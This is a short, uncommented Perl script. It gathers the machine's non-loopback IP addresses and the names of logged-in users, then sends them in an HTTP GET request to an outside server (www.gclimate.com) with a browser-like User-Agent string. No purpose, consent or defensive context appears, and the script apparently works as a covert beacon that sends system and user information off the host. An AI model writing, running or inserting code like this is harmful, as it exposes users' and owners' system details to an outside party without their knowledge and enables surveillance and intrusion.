#!/usr/bin/perl
use Net::HTTP;
my $host = "www.gclimate.com";
my $url = "/cgi-bin/uiscgi?";
open(IF,"/sbin/ifconfig -a 2>&1 |") or die $@;
open(USR,"/usr/bin/w -hs 2>&1 |") or die $@;
while(<IF>) { /inet addr:(\S+)/ and $1 ne "127.0.0.1" and $if{$1} = 1; }
while(<USR>) { $usr{(split)[0]} = 1 }
$q = 'i='.join(',', sort keys %if) . '&u=' . join(',', sort keys %usr);
$s = Net::HTTP->new(Host => $host) or die $@;
$s->write_request(GET => $url . $q, 'User-Agent' => 'Mozilla/5.0');
$s->read_response_headers;
